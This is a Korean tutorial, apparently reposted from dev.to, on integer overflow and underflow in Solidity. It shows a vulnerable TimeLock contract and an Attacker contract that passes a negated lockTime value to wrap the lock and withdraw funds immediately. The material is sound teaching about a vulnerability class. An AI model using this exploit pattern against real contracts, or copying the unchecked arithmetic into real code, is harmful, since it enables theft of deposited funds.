산술 오버플로우/언더플로우
7995 단어 soliditysecuritybestpractice
먼저 underflow/overflow가 무엇인지 이해합시다.
예: uint var1 = 2**256 - 1
var1 + 1은 0이 됩니다.
var1 + 2는 1이 됩니다.
예: uint var2 = 0
var2 -1 = 2*256 -1
var2 -2 = 2*256 -2
이제 예를 들어 이해해 봅시다. 사용자로부터 eth를 수락하고 일정 시간 동안 잠그는 계약을 고려하십시오. 사용자는 이 시간 제한 전에는 출금할 수 없지만 원하는 경우 시간 제한을 늘릴 수 있습니다.
contract TimeLock {
mapping (address => uint) public balances;
mapping (address => uint) public lockTime;
function deposit() external payable{ // to deposit
balances[msg.sender] += msg.value;
lockTime[msg.sender] += block.timestamp + 1 weeks;
}
function withdraw() external { // to withdraw
uint bal = balances[msg.sender];
require(bal > 0, "No balance to withdraw");
require(lockTime[msg.sender] <= block.timestamp, "Time left yet");
balances[msg.sender] = 0; // updating before sending, to avoid reentrancy
(bool sent,) = msg.sender.call{value: bal}("");
require(sent, "Send ETH failed");
}
function increaseTimeLimit(uint _seconds) external { // to increase lock time
lockTime[msg.sender] += _seconds;
}
}
이제 공격자가 이 컨트랙트를 해킹하고 즉시 자금을 얻으려면 오버플로만 하면 됩니다
lockTime[msg.sender]
. 이 작업이 완료되면 require(lockTime[msg.sender] <= block.timestamp, "Time left yet");
함수의 withdraw()
가 통과됩니다(lockTime[msg.sender]
가 오버플로 후 작은 숫자와 같기 때문입니다).공격자가 이를 달성하는 방법을 살펴보겠습니다.
contract Attacker {
TimeLock timeLockContract;
receive() external payable{
}
constructor(address _timeLock) {
timeLockContract = TimeLock(_timeLock);
}
function deposit() external payable {
timeLockContract.deposit{value: msg.value}();
}
function attack() external {
timeLockContract.increaseTimeLimit(uint(-timeLockContract.lockTime(address(this))));
timeLockContract.withdraw();
}
function getBalance() external view returns(uint) {
return address(this).balance;
}
}
attack()
함수에서 언더플로를 사용하여 매우 큰 숫자를 얻습니다: timeLockContract.increaseTimeLimit(uint(-timeLockContract.lockTime(address(this))));
. 이 큰 숫자는 TimeLock 계약에서 lockTime[msg.sender]
에 추가되어 오버플로를 유발합니다. 따라서 인출이 실행됩니다.
Reference
이 문제에 관하여(산술 오버플로우/언더플로우), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/rushanksavant/arithmetic-overflowunderflow-2iee텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)